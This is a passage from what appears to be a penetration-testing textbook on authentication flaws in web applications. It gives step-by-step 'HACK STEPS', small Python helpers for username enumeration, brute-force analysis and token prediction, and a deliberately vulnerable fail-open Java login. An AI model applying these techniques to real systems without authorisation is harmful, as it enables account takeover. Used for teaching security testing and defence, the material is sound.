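Only a digest of the token is stored, so a read-only compromise of the store does not reveal usable recovery URLs. The recipient address is never taken from the request, which avoids the flaw described in the third sub-item above.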

HACK STEPS

■ Identify any forgotten password functionality within the application. If

this is not explicitly linked from published content, it may still be imple-

mented (see Chapter 4).

■ Understand how the forgotten password function works by doing a com-

plete walk-through using an account you control.

■ If the mechanism uses a challenge, determine whether users are able to

set or select their own challenge and response. If so, use a list of enu-

merated or common usernames to harvest a list of challenges, and

review this for any that appear easily guessable.

■ If the mechanism uses a password “hint,” do the same exercise to har-

vest a list of password hints, and target any that are easily guessable.

■ Try to identify any behavior in the forgotten password mechanism that

can be exploited as the basis for username enumeration or brute-force

attacks (see the previous details).

■ If the application generates an email containing a recovery URL in

response to a forgotten password request, obtain a number of these

URLs, and attempt to identify any patterns that may enable you to predict

the URLs issued to other users. Employ the same techniques as are rele-

vant to analyzing session tokens for predictability (see Chapter 7).
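As a first pass over a sample of recovery URLs, it can help to see which character positions never change and whether any trailing number advances in regular steps. The sketch below assumes you have extracted the token portion of several URLs issued in quick succession. The sample values and function names are hypothetical.

```python
import re


def constant_positions(tokens):
    """Return the indices at which every token has the same character."""
    shortest = min(len(t) for t in tokens)
    return [i for i in range(shortest) if len({t[i] for t in tokens}) == 1]


def numeric_steps(tokens):
    """If every token ends in digits, return the successive differences.

    Returns None when any token lacks a trailing number.
    """
    values = []
    for token in tokens:
        match = re.search(r"(\d+)$", token)
        if match is None:
            return None
        values.append(int(match.group(1)))
    return [later - earlier for earlier, later in zip(values, values[1:])]


# Hypothetical tokens taken from three recovery URLs requested in sequence.
sample = ["a9f3-0001041", "a9f3-0001042", "a9f3-0001044"]
```

Small positive steps with occasional gaps, as in this sample, would suggest a counter shared with other users' requests. Truly random tokens should show few constant positions and no regular steps.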


“Remember Me” Functionality

Applications often implement “remember me” functions as a convenience to

users, to prevent them needing to reenter their username and password each

time they use the application from a specific computer. These functions are

often insecure by design and leave the user exposed to attack both locally and

by users on other computers:

■■

Some “remember me” functions are implemented using a simple per-

sistent cookie, such as

RememberUser=peterwiener (see Figure 6-5).

When this cookie is submitted to the initial application page, the appli-

cation trusts the cookie to authenticate the user, and creates an applica-

tion session for that person, bypassing the login. An attacker can use a

list of common or enumerated usernames to gain full access to the

application without any authentication.

Figure 6-5: A vulnerable “remember me” function

■■

Some “remember me” functions set a cookie which does not contain

the username but rather a kind of persistent session identifier — for

example,

RememberUser=1328. When the identifier is submitted to the

login page, the application looks up the user associated with it and

creates an application session for that user. As with ordinary session

tokens, if the session identifiers of other users can be predicted or

extrapolated, an attacker can iterate through a large number of poten-

tial identifiers to find those associated with application users, and so

gain access to their accounts without authentication. See Chapter 7 for

techniques for performing this attack.


■■

Even if the information stored in a cookie for re-identifying users is

suitably protected (e.g., encrypted) to prevent other users from deter-

mining or guessing it, the information may still be vulnerable to cap-

ture through a bug such as cross-site scripting (see Chapter 12).

HACK STEPS

■ Activate any “remember me” functionality, and determine whether the

functionality indeed does fully “remember” the user or whether it only

remembers their username and still requires them to enter a password

on subsequent visits. If the latter is the case, the functionality is much

less likely to expose any security flaw.

■ Closely inspect all persistent cookies that are set. Look for any saved

data that identifies the user explicitly or appears to contain some pre-

dictable identifier of the user.

■ Even where data stored appears to be heavily encoded or obfuscated,

review this closely and compare the results of “remembering” several

very similar usernames and/or passwords to identify any opportunities

for reverse engineering the original data. Here, use the same techniques

that are described in Chapter 7 for detecting meaning and patterns in

session tokens.

■ Attempt to modify the contents of the persistent cookie to try and con-

vince the application that another user has saved his details on your

computer.
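When a persistent cookie looks encoded, a quick check is to try the common reversible encodings before attempting any deeper analysis. The following sketch tries URL, hexadecimal, and Base64 decoding on a cookie value. The function name candidate_decodings is hypothetical, and the set of encodings is an assumption. Real applications may use others, or layer several.

```python
import base64
import binascii
from urllib.parse import unquote


def candidate_decodings(value):
    """Return a dict of encoding name -> decoded text for each that succeeds."""
    results = {}

    url_decoded = unquote(value)
    if url_decoded != value:
        results["url"] = url_decoded

    try:
        results["hex"] = bytes.fromhex(value).decode("utf-8")
    except ValueError:  # also covers UnicodeDecodeError
        pass

    try:
        # validate=True rejects characters outside the Base64 alphabet
        results["base64"] = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        pass

    return results
```

For example, passing the Base64 form of peterwiener returns a dictionary whose "base64" entry is the plain username. A value that decodes cleanly under more than one scheme should be checked against cookies issued for several similar usernames.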

User Impersonation Functionality

Some applications implement the facility for a privileged user of the applica-

tion to impersonate other users, in order to access data and carry out actions

within their user context. For example, some banking applications allow

helpdesk operators to verbally authenticate a telephone user and then switch

their application session into that user’s context in order to assist them.

Various design flaws commonly exist within impersonation functionality:

■■

It may be implemented as a “hidden” function, which is not subject to

proper access controls. For example, anyone who knows or guesses the

URL

/admin/ImpersonateUser.jsp may be able to make use of the

function and impersonate any other user (see Chapter 8).

■■

The application may trust user-controllable data when determining

whether the user is performing impersonation. For example, in addition

to a valid session token, a user may also submit a cookie specifying


which account their session is currently using. An attacker may be able

to modify this value and gain access to other user accounts without

authentication, as shown in Figure 6-6.

Figure 6-6: A vulnerable user impersonation function

■■

If an application allows administrative users to be impersonated, then

any weakness in the impersonation logic may result in a vertical privi-

lege escalation vulnerability — rather than simply gaining access to

other ordinary users’ data, an attacker may gain full control of the

application.

■■

Some impersonation functionality is implemented as a simple “back-

door” password that can be submitted to the standard login page along

with any username in order to authenticate as that user. This design is

highly insecure for many reasons, but the biggest opportunity for

attackers is that they are likely to discover this password when per-

forming standard attacks such as brute forcing of the login. If the back-

door password is matched before the user’s actual password, then the

attacker is likely to discover the function of the backdoor password and

so gain access to every user’s account. Similarly, a brute-force attack

might result in two different “hits,” thereby revealing the backdoor

password as shown in Figure 6-7.


Figure 6-7: A password-guessing attack with two “hits,”

indicating the presence of a backdoor password

HACK STEPS

■ Identify any impersonation functionality within the application. If this is

not explicitly linked from published content, it may still be implemented

(see Chapter 4).

■ Attempt to use the impersonation functionality directly to impersonate

other users.

■ Attempt to manipulate any user-supplied data that is processed by the

impersonation function in an attempt to impersonate other users. Pay

particular attention to any cases where your username is being submit-

ted other than during normal login.

■ If you succeed in making use of the functionality, attempt to impersonate

any known or guessed administrative users, in order to elevate privileges.

■ When carrying out password guessing attacks (see the “Brute-Forcible

Login” section), review whether any users appear to have more than one

valid password, or whether a specific password has been matched

against several usernames. Also, log in as many different users with the

credentials captured in a brute-force attack, and review whether every-

thing appears normal. Pay close attention to any “logged in as X” status

message.
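The review of brute-force results described in the last step can be automated. The sketch below assumes the results are available as a list of (username, password) pairs that produced a successful login. The function name summarize_hits and the sample data are hypothetical.

```python
from collections import defaultdict


def summarize_hits(hits):
    """Find users with several valid passwords and passwords valid for several users.

    hits is an iterable of (username, password) pairs that logged in successfully.
    Returns (multi_password_users, shared_passwords), both as dicts of sorted lists.
    """
    passwords_by_user = defaultdict(set)
    users_by_password = defaultdict(set)
    for username, password in hits:
        passwords_by_user[username].add(password)
        users_by_password[password].add(username)

    multi_password_users = {
        user: sorted(passwords)
        for user, passwords in passwords_by_user.items()
        if len(passwords) > 1
    }
    shared_passwords = {
        password: sorted(users)
        for password, users in users_by_password.items()
        if len(users) > 1
    }
    return multi_password_users, shared_passwords


# Hypothetical successful logins from a password-guessing run.
hits = [
    ("alice", "summer07"),
    ("alice", "letmein!"),
    ("bob", "letmein!"),
    ("carol", "qwerty"),
]
```

A password that appears in both results, such as letmein! here, is a candidate backdoor password. A password shared by several users may of course simply be a popular choice, so confirm by trying it against an account you control.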


Incomplete Validation of Credentials

Well-designed authentication mechanisms enforce various requirements on

passwords, such as a minimum length or the presence of both uppercase and

lowercase characters. Correspondingly, some poorly designed authentication

mechanisms not only do not enforce these good practices but also do not take

account of users’ own attempts to comply with them.

For example, some applications truncate passwords and so only validate the

first n characters. Some applications perform a case-insensitive check of pass-

words. Some applications strip out unusual characters (sometimes on the pre-

text of performing input validation) before checking passwords.

Each of these limitations on password validation reduces, often by an order of

magnitude or more, the number of variations available in the set of possible passwords.

Through experimentation, you can determine whether a password is being

fully validated, or whether any limitations are in effect. You can then fine-tune

your automated attacks against the login to remove unnecessary test cases,

thereby massively reducing the number of requests necessary to compromise

user accounts.
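The scale of the reduction can be estimated with simple arithmetic. The sketch below assumes, purely for illustration, an eight-character password drawn from the 94 printable ASCII characters, and compares the full keyspace with the keyspace under case-insensitive checking and under truncation to six characters.

```python
def keyspace(alphabet_size, length):
    """Number of distinct passwords of exactly the given length."""
    return alphabet_size ** length


# Assumed alphabet: 26 lowercase + 26 uppercase + 10 digits + 32 symbols.
full = keyspace(26 + 26 + 10 + 32, 8)

# Case-insensitive checking collapses the two letter sets into one.
case_insensitive = keyspace(26 + 10 + 32, 8)

# Truncation means only the first six characters are ever validated.
truncated = keyspace(94, 6)

case_factor = full / case_insensitive
truncation_factor = full // truncated
```

Under these assumptions, case-insensitive checking shrinks the search space by a factor of about 13, and truncation to six characters shrinks it by a factor of 94 squared. The exact figures depend on the real alphabet and length, but the effect on attack cost is of this order.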

HACK STEPS

■ Using an account you control, attempt to log in with variations on your

own password: removing the last character, changing the case of a char-

acter, and removing any special typographical characters. If any of these

attempts is successful, continue experimenting to try and understand

what validation is actually occurring.

■ Feed any results back into your automated password guessing attacks, to

remove superfluous test cases and improve the chances of success.
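The variations listed in the first step can be generated mechanically. The following sketch produces one variant per test from a known password. The function name password_variants and the choice of which character to alter are assumptions made for illustration.

```python
def password_variants(password):
    """Return test variants of a known password, keyed by the check they probe."""
    variants = {}

    # Truncation test: drop the last character.
    if len(password) > 1:
        variants["truncated"] = password[:-1]

    # Case test: flip the case of the first alphabetic character only.
    for index, char in enumerate(password):
        if char.isalpha():
            variants["case_changed"] = (
                password[:index] + char.swapcase() + password[index + 1:]
            )
            break

    # Character-stripping test: remove everything that is not a letter or digit.
    stripped = "".join(ch for ch in password if ch.isalnum())
    if stripped != password:
        variants["specials_removed"] = stripped

    return variants
```

Each variant that logs in successfully identifies a corresponding weakness in validation. A password containing no letters or no special characters simply yields fewer variants.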

Non-Unique Usernames

Some applications that support self-registration allow users to specify their

own username, and do not enforce a requirement that usernames be unique.

Although rare, the authors have encountered more than one application with

this behavior.

This represents a design flaw for two reasons:

■■

One user who shares a username with another user may also happen to

select the same password as that user, either during registration or in a

subsequent password change. In this eventuality, the application will

either reject the second user’s chosen password or will allow two


accounts to have identical credentials. In the first instance, the applica-

tion’s behavior will effectively disclose to one user the credentials of a

different user. In the second instance, subsequent logins by one of the

users will result in access to the other user’s account.

■■

An attacker may exploit this behavior to carry out a successful brute-

force attack, even though this may not be possible elsewhere due to

restrictions on failed login attempts. An attacker can register a specific

username multiple times with different passwords, while monitoring

for the differential response that indicates that an account with that

username and password already existed. The attacker will have ascer-

tained a target user’s password without making a single attempt to log

in as that user.

Badly designed self-registration functionality can also provide a means for

username enumeration. If an application disallows duplicate usernames, then

an attacker may attempt to register large numbers of common usernames to

identify the existing usernames that are rejected.

HACK STEPS

■ If self-registration is possible, attempt to register the same username

twice with different passwords.

■ If the application blocks the second registration attempt, you can exploit

this behavior to enumerate existing usernames even if this is not possi-

ble on the main login page or elsewhere. Make multiple registration

attempts with a list of common usernames to identify the already regis-

tered names that the application blocks.

■ If the registration of duplicate usernames succeeds, attempt to register

the same username twice with the same password, and determine the

application’s behavior:

    ■ If an error message results, you can exploit this behavior to carry out a

      brute-force attack, even if this is not possible on the main login page.

      Target an enumerated or guessed username, and attempt to register

      this username multiple times with a list of common passwords. When

      the application rejects one specific password, you have probably

      found the existing password for the targeted account.

    ■ If no error message results, log in using the credentials you specified

      and see what happens. You may need to register several users, and

      modify different data held within each account, to understand

      whether this behavior can be used to gain unauthorized access to

      other users’ accounts.


Predictable Usernames

Some applications automatically generate account usernames according to

some predictable sequence (for example, cust5331, cust5332, etc.). When an

application behaves like this, an attacker who can discern the sequence can

very quickly arrive at a potentially exhaustive list of all valid usernames,

which can be used as the basis for further attacks. Unlike enumeration meth-

ods that rely on making repeated requests driven by wordlists, this means of

determining usernames can be carried out very non-intrusively with minimal

interaction with the application.

HACK STEPS

■ If usernames are generated by the application, try to obtain several user-

names in quick succession and determine whether any sequence or pat-

tern can be discerned.

■ If so, extrapolate backwards to obtain a list of possible valid usernames.

This can be used as the basis for a brute-force attack against the login

and other attacks where valid usernames are required, such as the

exploitation of access control flaws (see Chapter 8).
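Once a sequence has been recognized, extrapolating it is straightforward. The sketch below assumes usernames consist of a fixed prefix followed by a zero-padded number, as in the cust5331 example. The function name extrapolate_usernames and the count_back parameter are hypothetical.

```python
import re


def extrapolate_usernames(observed, count_back=5):
    """Generate earlier usernames from a 'prefix + number' sequence.

    Returns an empty list if the observed names do not share one prefix
    followed by digits.
    """
    parsed = [re.fullmatch(r"(\D*)(\d+)", name) for name in observed]
    if not all(parsed):
        return []
    prefixes = {match.group(1) for match in parsed}
    if len(prefixes) != 1:
        return []

    prefix = prefixes.pop()
    width = len(parsed[0].group(2))  # preserve zero padding
    lowest = min(int(match.group(2)) for match in parsed)
    start = max(lowest - count_back, 0)
    return [f"{prefix}{number:0{width}d}" for number in range(start, lowest)]
```

Given cust5331 and cust5332 with count_back set to 3, this yields cust5328, cust5329, and cust5330. Whether those accounts actually exist still has to be confirmed against the application.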

Predictable Initial Passwords

In some applications, users are created all at once or in sizeable batches and are

automatically assigned initial passwords, which are then distributed to them

through some means. The means of generating passwords may enable an

attacker to predict the passwords of other application users. This kind of vul-

nerability is more common on intranet-based corporate applications — for

example, where every employee has an account created on their behalf, and

receives a printed notification of their password.

In the most vulnerable cases, all users receive the same password, or one

closely derived from their username or job function. In other cases, generated

passwords may contain sequences that could be identified or guessed with

access to a very small sample of initial passwords.

HACK STEPS

■ If passwords are generated by the application, try to obtain several pass-

words in quick succession and determine whether any sequence or pat-

tern can be discerned.

■ If so, extrapolate the pattern to obtain a list of passwords for other appli-

cation users.


■ If passwords demonstrate a pattern that can be correlated with user-

names, you can try to log in using known or guessed usernames and the

corresponding inferred passwords.

■ Otherwise, you can use the list of inferred passwords as the basis for a

brute-force attack with a list of enumerated or common usernames.

Insecure Distribution of Credentials

Many applications employ a process in which credentials for newly created

accounts are distributed to users out-of-band of their normal interaction with

the application (for example, via post or email). Sometimes, this is done for rea-

sons motivated by security concerns — for example, to provide assurance that

the postal or email address supplied by the user actually belongs to that person.

In some cases, this process can present a security risk. For example, if the

message distributed contains both username and password, there is no time

limit on their use, and there is no requirement for the user to change password

on first login, then it is highly likely that a large number, even a majority, of

application users will not modify their initial credentials and that the distribu-

tion messages will remain in existence for a lengthy period during which they

may be accessed by an unauthorized party.

Sometimes, what is distributed is not the credentials themselves, but rather

an “account activation” URL, which enables users to set their own initial pass-

word. If the series of these URLs sent to successive users manifests any kind of

sequence, then an attacker can identify this by registering multiple users in

close succession, and then infer the activation URLs sent to recent and forth-

coming users.

HACK STEPS

■ Obtain a new account. If you are not required to set all credentials during

registration, determine the means by which the application distributes

credentials to new users.

■ If an account activation URL is used, try to register several new accounts

in close succession and identify any sequence in the URLs you receive. If

a pattern can be determined, try to predict the activation URLs sent to

recent and forthcoming users, and attempt to use these URLs to take

ownership of their accounts.

■ Try to reuse a single reactivation URL multiple times, and see if the appli-

cation allows this. If not, try locking out the target account before reusing

the URL, and see if it now works.


Implementation Flaws in Authentication

Even a well-designed authentication mechanism may be highly insecure due

to mistakes made in its implementation. These mistakes may lead to informa-

tion leakage, complete login bypassing, or a weakening of the overall security

of the mechanism as designed. Implementation flaws tend to be more subtle

and harder to detect than design defects such as poor quality passwords and

brute forcibility. For this reason, they are often a fruitful target for attacks

against the most security-critical applications, where numerous threat models

and penetration tests are likely to have claimed any low-hanging fruit. The

authors have identified each of the implementation flaws described here

within the web applications deployed by large banks.

Fail-Open Login Mechanisms

Fail-open logic is a species of logic flaw (described in detail in Chapter 11) and

one that has particularly serious consequences in the context of authentication

mechanisms.

The following is a fairly contrived example of a login mechanism that fails

open. If the call to

db.getUser() throws an exception for some reason (for

example, a null pointer exception arising because the user’s request did not

contain a username or password parameter), then the login will be successful.

Although the resulting session may not be bound to a particular user identity,

and so may not be fully functional, this may still enable an attacker to access

some sensitive data or functionality.

public Response checkLogin(Session session) {
    try {
        String uname = session.getParameter("username");
        String passwd = session.getParameter("password");
        User user = db.getUser(uname, passwd);
        if (user == null) {
            // invalid credentials
            session.setMessage("Login failed.");
            return doLogin(session);
        }
    }
    catch (Exception e) {} // the exception is swallowed, so execution falls through
    // valid user
    session.setMessage("Login successful.");
    return doMainMenu(session);
}


In the field, one would not expect code like this to pass even the most cur-

sory security review. However, the same conceptual flaw is much more likely

to exist in more complex mechanisms in which numerous layered method

invocations are made, in which many potential errors may arise and be han-

dled in different places, and where the more complicated validation logic may

involve maintaining significant state about the progress of the login.
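To make the flaw concrete, the following Python sketch reproduces the same fail-open pattern alongside a fail-closed variant. It is a simplified analogue rather than a translation of any real application. The UserStore class and both function names are hypothetical, and a missing username raises AttributeError here in place of the null pointer exception mentioned above.

```python
class UserStore:
    """Toy credential store (plaintext comparison, for illustration only)."""

    def __init__(self, users):
        self._users = users

    def get_user(self, username, password):
        key = username.lower()  # raises AttributeError if username is None
        if self._users.get(key) == password:
            return key
        return None


def check_login_fail_open(db, params):
    try:
        user = db.get_user(params.get("username"), params.get("password"))
        if user is None:
            return "login"  # invalid credentials
    except Exception:
        pass  # swallowed error falls through to the success path
    return "main_menu"


def check_login_fail_closed(db, params):
    try:
        user = db.get_user(params.get("username"), params.get("password"))
    except Exception:
        return "login"  # any error is treated as a failed login
    if user is None:
        return "login"
    return "main_menu"
```

Submitting a request with no parameters reaches the main menu in the first function and is rejected by the second. The only difference is that the success path in the fail-closed version can be reached solely after a non-null user has been returned.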

HACK STEPS

■ Perform a complete, valid login using an account you control. Record

every piece of data submitted to the application, and every response

received, using your intercepting proxy.

■ Repeat the login process numerous times, modifying pieces of the data

submitted in unexpected ways. For example, for each request parameter

or cookie sent by the client:

    ■ Submit an empty string as the value.

    ■ Remove the name/value pair altogether.

    ■ Submit very long and very short values.

    ■ Submit strings instead of numbers and vice versa.

    ■ Submit the same item multiple times, with the same and different values.

■ For each malformed request submitted, review closely the application’s

response to identify any divergences from the base case.

■ Feed these observations back into framing your test cases. When one

modification causes a change in behavior, try to combine this with other

changes to push the application’s logic to its limits.
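The malformed requests described in these steps can be generated systematically from a recorded valid login. The sketch below assumes the request parameters are held as an ordered list of (name, value) string pairs. The function names and the specific test values (for example, a 5,000-character string) are arbitrary choices made for illustration.

```python
def replace_at(params, index, new_pairs):
    """Return a copy of params with the pair at index replaced by new_pairs."""
    return params[:index] + list(new_pairs) + params[index + 1:]


def mutate_parameters(params):
    """Yield (description, mutated parameter list) for each test case."""
    for i, (name, value) in enumerate(params):
        # Swap the apparent type: digits become letters and vice versa.
        swapped = "abc" if value.isdigit() else "1"
        yield f"{name}: empty", replace_at(params, i, [(name, "")])
        yield f"{name}: removed", replace_at(params, i, [])
        yield f"{name}: very long", replace_at(params, i, [(name, "A" * 5000)])
        yield f"{name}: very short", replace_at(params, i, [(name, "A")])
        yield f"{name}: type swapped", replace_at(params, i, [(name, swapped)])
        yield (
            f"{name}: duplicated, same value",
            replace_at(params, i, [(name, value), (name, value)]),
        )
        yield (
            f"{name}: duplicated, different value",
            replace_at(params, i, [(name, value), (name, value + "x")]),
        )
```

Each generated list changes exactly one parameter relative to the base case, which makes any divergence in the application's response easy to attribute. Combinations of changes can then be built by applying the generator to an already mutated list.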

Defects in Multistage Login Mechanisms

Some applications use elaborate login mechanisms involving multiple stages.

For example:

■■

Entry of a username and password.

■■

A challenge for specific digits from a PIN or a memorable word.

■■

The submission of a value displayed on a changing physical token.

Multistage login mechanisms are designed to provide enhanced security

over the simple model based on username and password. Typically, the first

stage requires the user to identify themselves with a username or similar item,

and subsequent stages perform various authentication checks. Such mecha-

nisms frequently contain security vulnerabilities, and in particular various

logic flaws (see Chapter 11).


COMMON MYTH It is often assumed that multistage login mechanisms

are less prone to security bypasses than standard username/password

authentication. This belief is misleading. Performing several authentication

checks may add considerable security to the mechanism. Counterbalancing this,

the process is more prone to flaws in implementation. In several cases where a

combination of flaws is present, it can even result in a solution that is less

secure than a normal login based on username and password.

Some implementations of multistage login mechanisms make potentially

unsafe assumptions at each stage about the user’s interaction with earlier

stages. For example:

■■

An application may assume that a user who accesses stage three must

have cleared stages one and two. Therefore, it may authenticate an

attacker who proceeds directly from stage one to stage three and cor-

rectly completes it, enabling an attacker to log in with only one part of

the various credentials normally required.

■■

An application may trust some of the data being processed at stage two

because this was validated at stage one. However, an attacker may be

able to manipulate this data at stage two, giving it a different value than

was validated at stage one. For example, at stage one the application

might determine whether the user’s account has expired, is locked out,

or is in the administrative group, or whether it needs to complete fur-

ther stages of the login beyond stage two. If an attacker can interfere

with these flags as the login transitions between different stages, they

may be able to modify the behavior of the application and cause it to

authenticate them with only partial credentials or otherwise elevate

privileges.

■■

An application may assume that the same user identity is used to com-

plete each stage; however, it might not explicitly check this. For exam-

ple, stage one might involve submitting a valid username and

password, and stage two might involve resubmitting the username

(now in a hidden form field) and a value from a changing physical

token. If an attacker submits valid data pairs at each stage, but for dif-

ferent users, then the application might authenticate the user as either

one of the identities used in the two stages. This would enable an

attacker who possesses his own physical token and discovers another

user’s password to log in as that user (or vice versa). Although the

login mechanism is not completely vulnerable without any prior

information, its overall security posture is substantially weakened and

the substantial expense and effort of implementing the two-factor

mechanism does not deliver the benefits expected.
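All three unsafe assumptions share a cause: state about the login's progress is inferred, or accepted from the client, rather than tracked on the server. The following sketch shows one way a two-stage login might hold that state server-side. It is an illustration only. The class name MultistageLogin and the injected check_password and check_token callables are hypothetical stand-ins for real credential checks.

```python
class MultistageLogin:
    """Tracks one user's progress through a two-stage login on the server."""

    def __init__(self, check_password, check_token):
        self._check_password = check_password
        self._check_token = check_token
        self._reset()

    def _reset(self):
        self._username = None
        self._password_ok = False

    def submit_password(self, username, password):
        """Stage one: returns True if the username and password are valid."""
        self._reset()
        if self._check_password(username, password):
            self._username = username
            self._password_ok = True
        return self._password_ok

    def submit_token(self, token_value):
        """Stage two: returns the authenticated username, or None.

        The username is never accepted from the client at this stage. It is
        taken from the state recorded at stage one.
        """
        if not self._password_ok:
            return None  # stage one was skipped or failed
        username = self._username
        self._reset()  # one token attempt per completed stage one
        if self._check_token(username, token_value):
            return username
        return None
```

Because stage two has no username parameter, an attacker cannot pair one user's password with another user's token, and a request that jumps straight to stage two is rejected.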


HACK STEPS

■ Perform a complete, valid login using an account you control. Record

every piece of data submitted to the application using your intercepting

proxy.

■ Identify each distinct stage of the login and the data that is collected at

each stage. Determine whether any single piece of information is col-

lected more than once or is ever transmitted back to the client and

resubmitted, via a hidden form field, cookie, or preset URL parameter

(see Chapter 5).

■ Repeat the login process numerous times with various malformed

requests:

■

Try performing the login steps in a different sequence.

■

Try proceeding directly to any given stage and continuing from there.

■

Try skipping each stage and continuing with the next.

■

Use your imagination to think of further ways of accessing the differ-

ent stages that the developers may not have anticipated.

■ If any data is submitted more than once, try submitting a different value

at different stages, and see whether the login is still successful. It may

be that some of the submissions are superfluous and are not actually

processed by the application. It might be that the data is validated at one

stage and then trusted subsequently — in this instance, try to provide the

credentials of one user at one stage, and then switch at the next to actu-

ally authenticate as a different user. It might be that the same piece of

data is validated at more than one stage, but against different checks —

in this instance, try to provide (for example) the username and password

of one user at the first stage, and the username and PIN of a different

user at the second stage.

■ Pay close attention to any data being transmitted via the client that was

not directly entered by the user. This may be used by the application to

store information about the state of the login progress, and may be

trusted by the application. For example, if the request for stage three

includes the parameter “stage2complete=true” then it may be possible

to advance straight to stage three by setting this value. Try to modify the

values being submitted and determine whether this enables you to

advance or skip stages.
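
The identity-switching test described in the steps above can be illustrated with a toy model. This is a minimal sketch under stated assumptions, not code from any real application: the function names, usernames, and token values are all hypothetical. It shows a two-stage login that validates each stage in isolation but never checks that both stages refer to the same user, followed by a variant that does.

```python
# Toy model only: every name and value here is hypothetical.
PASSWORDS = {"alice": "alice-password", "mallory": "mallory-password"}
TOKEN_CODES = {"alice": "111111", "mallory": "999999"}  # current token values


def flawed_login(stage1_user, password, stage2_user, token_code):
    """Validate each stage in isolation and trust the stage-one identity."""
    if PASSWORDS.get(stage1_user) != password:
        return None
    # Flaw: the token is checked against the username resubmitted at stage
    # two, which the client controls and which may differ from stage one.
    if TOKEN_CODES.get(stage2_user) != token_code:
        return None
    return stage1_user


def stricter_login(stage1_user, password, stage2_user, token_code):
    """Same checks, but reject any change of identity between stages."""
    if stage2_user != stage1_user:
        return None
    return flawed_login(stage1_user, password, stage2_user, token_code)
```

In this model, a user who holds her own token and has learned another user's password can call `flawed_login("alice", "alice-password", "mallory", "999999")` and is authenticated as `alice`. The stricter variant rejects the same input.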

Some login mechanisms employ a randomly varying question at one of the

stages of the login process. For example, after submitting a username and

password, the user might be asked one of various “secret” questions (regard-

ing their mother’s maiden name, place of birth, name of first school, etc.) or to

submit two random letters from a secret phrase. The rationale for this behav-

ior is that even if an attacker captures everything that a user enters on a single

occasion, this will not enable them to log in as that user on a different occasion,

because different questions will be asked.

In some implementations, this functionality is broken and does not achieve

its objectives:

■■

The application may present a randomly chosen question, and store

the details of the question within a hidden HTML form field or cookie,

rather than on the server. The user subsequently submits both the

answer and the question itself. This effectively allows an attacker to

choose which question to answer, enabling the attacker to repeat a

login having captured a user’s input on a single occasion.

■■

The application may present a randomly chosen question on each login

attempt but not remember which question a given user was asked in the

event that he or she fails to submit an answer. If the same user initiates a

fresh login attempt a moment later, a different random question will be

generated. This effectively allows an attacker to cycle through questions

until they receive one to which they know the answer, enabling them to

repeat a login having captured a user’s input on a single occasion.

NOTE The second of these conditions is really quite subtle, and as a result,

many real-world applications are vulnerable. An application that challenges a

user for two random letters of a memorable word may appear at first glance to

be functioning properly and providing enhanced security. However, if the letters

are randomly chosen each time the previous authentication stage is passed,

then an attacker who has captured a user’s login on a single occasion can

simply reauthenticate up to this point until the two letters that he knows are

requested, without the risk of account lockout.
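
The cost of this attack can be estimated with a short simulation. The sketch below is illustrative only and assumes a hypothetical application that picks two fresh letter positions of a memorable word on every partial login; the function names and the word length are assumptions, not details of any real system.

```python
import random


def request_challenge(word_length, rng):
    """Model an application that picks two fresh random letter positions
    each time the earlier login stage is passed."""
    first, second = sorted(rng.sample(range(word_length), 2))
    return (first, second)


def attempts_until_known_challenge(known_positions, word_length, rng, limit=10_000):
    """Repeat the partial login until the known positions are requested."""
    for attempt in range(1, limit + 1):
        if request_challenge(word_length, rng) == known_positions:
            return attempt
    raise RuntimeError("known challenge was not requested within the limit")
```

For an eight-letter word there are 28 possible pairs of positions, so an attacker who knows one pair needs about 28 partial logins on average before the application asks for exactly the letters that were captured.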

HACK STEPS

■ If one of the login stages uses a randomly varying question, verify

whether the details of the question are being submitted together with

the answer. If so, change the question, and submit the correct answer

associated with that question, and verify whether the login is still

successful.

■ If the application does not enable an attacker to submit an arbitrary

question and answer, perform a partial login several times with a single

account, proceeding each time as far as the varying question. If the ques-

tion changes on each occasion, then an attacker can still effectively

choose which question to answer.

NOTE In some applications where one component of the login varies

randomly, the application collects all of a user’s credentials at a single stage.

For example, the main login page may present a form containing fields for

username, password, and one of various secret questions. Each time the login

page is loaded, the secret question changes. In this situation, the randomness

of the secret question does nothing to prevent an attacker from replaying a

valid login request having captured a user’s input on one occasion, and the

attacker can simply reload the page until he receives the varying question to

which he knows the answer. In a variation on this scenario, the application may

set a persistent cookie to “ensure” that the same varying question is presented

to any given user until that person answers it correctly. This measure can of

course be trivially circumvented by modifying or deleting the cookie.

Insecure Storage of Credentials

If an application stores login credentials in an insecure manner, then the secu-

rity of the login mechanism is undermined, even though there may be no

inherent flaw in the authentication process itself.

It is very common to encounter web applications in which user credentials

are stored in unencrypted form within the database. Because the database

account used by the application must have full read/write access to those cre-

dentials, many kinds of other vulnerabilities within the application may be

exploitable to enable you to access these credentials — for example, command

or SQL injection flaws (Chapter 9) or access control weaknesses (Chapter 8).

HACK STEPS

■ Review the entire authentication-related functionality of the application,

and also any functions relating to user maintenance. If any instances are

found in which a user’s password is transmitted back to the client, then

this may indicate that passwords are being stored in an insecure manner.

■ If any kind of arbitrary command or query execution vulnerability is

identified within the application, attempt to find the location within the

application’s database or file system where user credentials are stored.

Query these to determine whether passwords are being stored in unen-

crypted form.

Securing Authentication

Implementing a secure authentication solution involves attempting to meet

several key security objectives simultaneously, and in many cases trading these

off against other objectives such as functionality, usability, and total cost. In some

cases “more” security can actually be counterproductive — for example, forc-

ing users to set very long passwords and change them frequently will often

lead users to write their passwords down.

Because of the enormous variety of possible authentication vulnerabilities,

and the potentially complex defenses that an application may need to deploy

in order to mitigate all of them, many application designers and developers

choose to accept certain threats as a given and concentrate their efforts

on preventing the most serious attacks. Factors to consider in striking an

appropriate balance include:

■■

The criticality of security given the functionality offered by the applica-

tion.

■■

The degree to which users will tolerate and work with different types of

authentication controls.

■■

The cost of supporting a less user-friendly system.

■■

The financial cost of competing alternatives in relation to the revenue

likely to be generated by the application or the value of the assets it is

protecting.

In this section we will describe the most effective ways possible to defeat the

various attacks against authentication mechanisms and leave readers to

decide which kinds of defenses are most appropriate for them in individual

cases.

Use Strong Credentials

■■

Suitable minimum password quality requirements should be enforced.

These may include rules regarding: minimum length; the appearance of

alphabetical, numeric, and typographical characters; the appearance of

both uppercase and lowercase characters; the avoidance of dictionary

words, names, and other common passwords; the prevention of a pass-

word being set to the username; and the prevention of a similarity or

match with previously set passwords. As with most security measures,

different password quality requirements may be appropriate for differ-

ent categories of user.

■■

Usernames should be unique.

■■

Any system-generated usernames and passwords should be created

with sufficient entropy that they cannot feasibly be sequenced or pre-

dicted even by an attacker who gains access to a large sample of succes-

sively generated instances.

■■

Users should be permitted to set sufficiently strong passwords — for

